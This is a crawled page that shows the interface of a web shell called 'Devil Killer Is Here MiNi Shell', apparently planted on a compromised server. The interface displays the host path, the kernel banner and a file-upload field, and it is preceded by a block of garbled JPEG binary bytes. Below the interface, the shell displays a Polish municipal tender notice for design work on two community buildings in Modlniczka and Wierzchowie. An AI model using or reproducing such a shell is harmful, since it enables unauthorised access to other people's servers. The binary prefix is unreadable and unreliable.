JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200217/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200217/513131-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 513131-N-2020 z dnia 2020-02-17 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Wielka Wieś</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">”Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektów pod nazwą: Zadanie nr 1.Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka na dz. nr 966 w m. Modlniczka Zadanie nr 2 Wielofunkcyjny budynek komunalny na potrzeby społeczności lokalnej na dz. nr 272 w m. Wierzchowie. ” </span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Wielka Wieś</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">55178600000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Plac Wspólnoty</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">32-085</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Szyce</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">012 4191704 wew. 130</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@wielka-wies.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">124 191 705</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.wielka.wies.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia">www.wielka-wies.pl</span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.wielka-wies.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.wielka-wies.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy Wielka Wieś, pl. Wspólnoty 1</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">”Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektów pod nazwą: Zadanie nr 1.Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka na dz. nr 966 w m. Modlniczka Zadanie nr 2 Wielofunkcyjny budynek komunalny na potrzeby społeczności lokalnej na dz. nr 272 w m. Wierzchowie. ” </span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.271.3.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest inwestycja pn: „Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektów pod nazwą: Zadanie nr 1.Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka na dz. nr 966 w m. ModlniczkaZadanie nr 2 Wielofunkcyjny budynek komunalny na potrzeby społeczności lokalnej na dz. nr 272 w m. Wierzchowie. ” 1.1. Zadanie nr 1. Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektu pod nazwą: Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka na dz. nr 966 w m. Modlniczka1.1.1Przedmiotem zamówienia jest opracowanie projektu budowlanego i wykonawczego wraz z prawomocną decyzją o pozwoleniu na budowę obiektu pod nazwą „Rozbudowa istniejącego budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny dla potrzeb społeczności lokalnej sołectwa Modlniczka”. Podlegający rozbudowie istniejący budynek posiada funkcję szatniowo-sanitarną z przeznaczeniem dla sportowców LKS Sportowiec Modlniczka. Z uwagi na uwarunkowania terenowo własnościowe oraz lokalizacyjne działki na której jest usytuowany podjęta została decyzja o jego rozbudowie tak aby mógł pełnić funkcję budynku wielofunkcyjnego w tym: - zachowana zostanie dotychczasowa funkcja szatniowo-sanitarna na parterze budynku - projektowana do rozbudowy część parterowa budynku przeznaczona zostanie dla Ochotniczej Straży Pożarnej z garażem na wozy bojowe, zaplecze socjalno-magazynowe i biuro- kondygnacja dachowa rozbudowanej części mieścić będzie salę wielofunkcyjną z zapleczem kuchennym i sanitariatami- ponadto część poddasza istniejącego budynku przeznaczona zostanie dla potrzeb KGW, natomiast pozostała jego część będzie użytkowana w sposób dotychczasowy.1.1.2.Zakres rzeczowy obejmuje:- wykonanie projektu budowlanego i wykonawczego architektury, konstrukcji, instalacji wewnętrznych wody, kanalizacji sanitarnej, instalacji elektrycznej, instalacji gazu, instalacji wentylacji mechanicznej, klimatyzacji (w sali wielofunkcyjnej i KGW), instalacji co i c.w.u. oraz kotłowni- wykonanie projektu instalacji strukturalnej, teletechnicznej, instalacji syreny alarmowej, nagłośnienia (w sali wielofunkcyjnej), monitoringu, odgromowej, wody p. poż., aranżacji wnętrz, technologii kuchni - wykonanie projektu przyłączy wod-kan. - wykonanie charakterystyki energetycznej, analizy racjonalnego wykorzystania energii- wykonanie projektu zagospodarowania terenu z uwzględnieniem zieleni- wykonanie mapy do celów projektowych- wykonanie badań geotechnicznych- zapewnienie projektantów sprawdzających projekty - uzyskanie warunków technicznych na poszczególne media (zwiększenie) - uzyskanie uzgodnień rzeczoznawców: sanepid, p.poż- skompletowanie dokumentów, przygotowanie i złożenie wniosku o pozwolenie na budowę.- uzyskanie prawomocnej decyzji o pozwoleniu na budowę- opracowanie przedmiarów i kosztorysów inwestorskich- o pracowanie STWIORB1.1.3.Zestawienie powierzchni charakterystycznych:- powierzchnia zabudowy części projektowanej - 346,64 m2- kubatura części projektowanej - 2.601,00 m3- powierzchnia całkowita budynków - 735,30 m2 - powierzchnia użytkowa części projektowanej - 456,70 m2- długość budynku projektowanego - 26,94 m - szerokość budynku projektowanego - 0,45 m- wysokość budynku projektowanego - 10,46 m- kąt pochylenia połaci dachowych - 35 st. 1.1.4 Stan istniejący zagospodarowania terenu.W stanie istniejący, na terenie objętym opracowaniem tj. działce nr 966 w Modlniczce zlokalizowane są obiekty sportowe. Na działce tej przy jej zachodniej granicy znajduje się budynek sportowy oraz trybuny o konstrukcji stalowej. Centralną część działki zajmuje boisko sportowe. Teren jest w całości ogrodzony ogrodzeniem z siatki stalowej na słupkach. Na obszarze działki nie występują drzewa wysokie. Nieliczne drzewa wysokie porastają wzdłuż północnej i wschodniej granicy działki. Działka jest uzbrojona: od strony zachodniej przebiega sieć wodociągowa i elektryczna. Ścieki sanitarne odprowadzane są do studzienki funkcjonującej kanalizacji sanitarnej. Działka jest praktycznie płaska, posiada jedynie lekki spadek w kierunku zachodnim. Zgodnie z zapisem i oznaczeniem w miejscowym planie zagospodarowania przestrzennego przedmiotowa działka częściowo znajduje się w terenie oznaczonym „US – teren urządzeń sportu i rekreacji” częściowo w terenie oznaczonym „TZ – teren zamknięty”. Zmiana miejscowa w MPZP Gminy dla tej inwestycji jest w trakcie. Istniejący wjazd na teren inwestycji z działki drogowej nr 703 (ul. Wrzosowa) zlokalizowany jest od strony zachodniej. Tam również usytuowany jest parking o nawierzchni żwirowej.1.1.5 Projektowane zagospodarowanie terenu.Projekt przewiduje przebudowę i rozbudowę budynku sportowego z przeznaczeniem na obiekt wielofunkcyjny. Projektowana rozbudowa zlokalizowana jest do strony północnej – w miejscu istniejącego parkingu. Projektuje się przesunięcie istniejącego zjazdu z drogi KDW w stronę północną i zlokalizowanie nowego większego parkingu na 83 miejsca postojowe w północno-zachodnim narożniku działki oraz wzdłuż północnej granicy działki. Poszerzenie istniejącego zjazdu pozwoli na utworzenie strefy wejściowej w formie niewielkiego placyku od strony frontowej budynków. Istniejące trybuny planuje się przenieść na wschodnią stronę boiska, natomiast w ich miejscu planuje się nowe o konstrukcji żelbetowej usytuowane wzdłuż wschodniej elewacji budynku wielofunkcyjnego.UWAGA!1.	Wszystkie informacje zawarte w przedstawionym wyżej opisie przedmiotu zamówienia znajdują się w projekcie koncepcyjnym wielofunkcyjnego budynku w miejscowości Modlniczka który dołączony jest do dokumentów dotyczących zapytania ofertowego.2.	Badania geologiczne oraz opracowania mapy dla celów projektowych leżą po stronie Wykonawcy projektu3.	Stosowanie do zapisu zawartego w koncepcji pkt I. 2. cyt. „Zgodnie z zapisem i oznaczeniem w miejscowym planie zagospodarowania przestrzennego przedmiotowa działka częściowo znajduje się w terenie oznaczonym US "teren urządzeń sportu i rekreacji", częściowo w terenie oznaczonym TZ "teren zamknięty" i konieczna będzie dla przedmiotowej inwestycji zmiana miejscowa w MPZP Gminy.” Inwestor informuje, że zawarł umowę na opracowanie MPZP z terminem do 31.12.2020r. 1.2. Zadanie nr 2 Opracowanie projektu budowlanego i wykonawczego wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę obiektu pod nazwą: Wielofunkcyjny budynek komunalny na potrzeby społeczności lokalnej na dz. nr 272 w m. Wierzchowie. ” 1.2.1.Przedmiotem zamówienia jest opracowanie projektu budowlanego i wykonawczego wraz z prawomocną decyzją o pozwoleniu na budowę obiektu pod nazwą „Budynek wielofunkcyjny na potrzeby społeczności lokalnej na działce nr 272 w miejscowości Wierzchowie gmina Wielka Wieś”1.2.2 Zakres rzeczowy obejmuje:- wykonanie projektu budowlanego i wykonawczego architektury, konstrukcji, instalacji wewnętrznych wody, kanalizacji sanitarnej, instalacji elektrycznej, instalacji gazu, instalacji wentylacji mechanicznej, klimatyzacji (w sali wielofunkcyjnej), instalacji co i c.w.u. oraz kotłowni- wykonanie projektu instalacji strukturalnej, teletechnicznej, nagłośnienia (w sali wielofunkcyjnej), monitoringu, odgromowej, wody p. poż., aranżacji wnętrz- wykonanie projektu przyłączy wod-kan. - wykonanie charakterystyki energetycznej, analizy racjonalnego wykorzystania energii- wykonanie projektu zagospodarowania terenu z uwzględnieniem zieleni- wykonanie mapy do celów projektowych- wykonanie badań geotechnicznych- zapewnienie projektantów sprawdzających projekty - uzyskanie warunków technicznych na poszczególne media - uzyskanie uzgodnień rzeczoznawców: sanepid, p.poż- skompletowanie dokumentów, przygotowanie i złożenie wniosku o pozwolenie na budowę.- uzyskanie prawomocnej decyzji o pozwoleniu na budowę- opracowanie przedmiarów i kosztorysów inwestorskich- opracowanie STWIOR1.2.3.Przeznaczenie i program użytkowy oraz charakterystyczne parametry techniczne projektowanego budynku:Budynek służyć będzie mieszkańcom jako miejsce spotkań, zebrań wiejskich, szkoleń bądź innych wydarzeń wynikających z bieżących potrzeb społeczności lokalnej. W budynku tym planuje się:- na parterze komunikacja, kotłownia, wiatrołap, wc dla niepełnosprawnych, szatnia/magazyn, sala sala wielofunkcyjna- w poddaszu catering, wiatrołap, komunikacja, wc 2 szt. sala wielofunkcyjna- Zestawienie charakterystycznych parametrów:- kubatura budynku - 700,00 m3- powierzchnia całkowita budynku - 195,47m2 - powierzchnia netto - 130,42m2- długość budynku projektowanego - 11,92 m - szerokość budynku projektowanego - 8,02 m- wysokość budynku projektowanego - 8,52m- kąt pochylenia połaci dachowych - 40 st. 1.2.4.Konstrukcja obiektu.Planuje się budynek w konstrukcji tradycyjnej murowanej, z zastosowaniem pustaków ceramicznych lub bloczków z betonu komórkowego. W części wschodniej ściany budynku w konstrukcji monolitycznej żelbetowej z uwagi na znaczne wymiary otworów okiennych. Strop i schody wewnętrzne monolityczne. Konstrukcja więźby dachowej tradycyjna, drewniana, planowana konstrukcja jętkowa bez stolcowa. 1.2.5.Wyposażenie budowlano-instalacyjne.Planowane ogrzewanie budynku gazowe, tradycyjne. Należy zaprojektować kotłownię w obrębie dolnego poziomu budynku. Należy rozważyć zaprojektowanie instalacji wentylacji mechanicznej z uwagi na okresowe wzmożone korzystanie z obiektu (spotkania, konferencje)1.2.6.Zagospodarowanie terenu działkiZałożono dostęp do niezbędnych mediów z pobliskich sieci wodociągowej, kanalizacji sanitarnej, energetycznej i gazowej. W ramach zagospodarowania należy zapewnić utwardzenie terenu niezbędne dla prawidłowego funkcjonowania budynku. Dodatkowo należy zaprojektować taras ziemny w południowo-wschodniej części terenu inwestycji.UWAGA!1.	Wszystkie informacje zawarte w przedstawionym wyżej opisie przedmiotu zamówienia znajdują się w projekcie koncepcyjnym wielofunkcyjnego budynku w miejscowości Wierzchowie, który dołączony jest do dokumentów dotyczących zapytania ofertowego.2.	Badania geologiczne oraz opracowania mapy dla celów projektowych leżą po stronie Wykonawcy projektu2. Projekty muszą być zgodny z : 1/	Ustawą z dnia 7 lipca 1994 r. – Prawo budowlane (t. j. Dz. U. 2016 poz. 290 ze zm.).2/	Ustawą z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (t. j. Dz. U. 2016 poz. 353 ze zm.).3/	Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (t. j. Dz. U. 2016 poz. 124 ze zm.).4/	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych (t. j. Dz. U. 2013 poz. 1129 ze zm.).5/	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych (Dz. U. 2004 Nr 130 poz. 1389 ze zm.).6/	Rozporządzenie Ministra Transportu, Budownictwa i Gospodarki Morskiej z 